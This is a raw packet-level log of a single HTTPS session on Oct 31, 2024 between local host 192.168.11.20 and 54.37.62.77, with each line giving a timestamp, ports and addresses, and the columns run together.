                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948049068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948049068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948092937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948142052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948174953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948234081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948270082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948270082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948314905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948314905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948374033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948374033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948412895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948451042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948479891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948525906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948525906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948570013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948648930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948648930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948676109 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948719978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948719978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948766947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948767900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948806047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948827982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948827982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948842049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948880911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948918104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948931932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949029922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949029922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949071884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.000844002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.000910044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.000967979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.000968933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004554033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004605055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004748106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004749060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004818916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004868984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004869938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004869938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.004869938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006218910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006278992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006424904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006424904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006479025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006504059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.006504059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008469105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008521080 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008685112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008686066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008686066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008755922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008794069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008794069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.008795023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.009944916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010003090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010159969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010159969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010214090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010238886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010238886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010238886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.010240078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.011768103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.011821032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.011977911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.011977911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.012037992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.012085915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013165951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013230085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013356924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013356924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013411045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013434887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013434887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.013533115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018260002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018312931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018479109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018479109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018547058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018595934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018596888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.018596888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020355940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020417929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020551920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020596981 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020632029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.020665884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022600889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022661924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022800922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022800922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022835970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022855043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022855043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.022910118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.026751041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.026814938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.026967049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.026967049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.027024984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.027049065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.027049065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.027049065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028239012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028290987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028451920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028451920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028506994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028531075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028531075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.028531075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029556036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029619932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029776096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029776096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029830933 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029856920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029856920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.029856920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.043713093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.043766975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.043950081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.043950081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.044018030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.044044018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.044044018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.044044018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.051460981 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183043957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183105946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183331013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183331966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183387995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183409929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.185997963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186049938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186220884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186220884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186275959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186300039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186300039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190553904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190615892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190836906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190836906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190896034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190916061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192667961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192720890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192883015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192938089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192954063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.193007946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196480036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196543932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196707964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196762085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196783066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198297977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198350906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198522091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198522091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198576927 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198599100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198599100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198662043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199054956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199115992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199362993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199389935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212349892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212402105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212616920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212616920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212675095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212696075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214467049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214530945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214675903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214737892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214764118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214764118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223436117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223490000 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223644018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223644018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223704100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223733902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223818064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228050947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228116035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228229046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228229046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228291988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228318930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228318930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228404045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230127096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230180979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230359077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230359077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230412960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230437994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231367111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231431007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231589079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231589079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231653929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233628035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233685970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233820915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233885050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233907938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233907938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.234003067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.236840963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.236906052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237062931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237117052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237133026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237238884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276727915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276781082 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276984930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276984930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276985884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.277045012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.277070045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283631086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369401932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369445086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369606972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369607925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369663954 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369689941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369689941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.369689941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371119022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371170044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371336937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371336937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371392012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371443033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.371443033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383287907 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383339882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383511066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383511066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383570910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383595943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383595943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.383595943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385541916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385606050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385760069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385761023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385814905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385839939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385839939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.385839939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.393867016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.393920898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.394085884 CET49755443192.168.11.2054.37.62.77
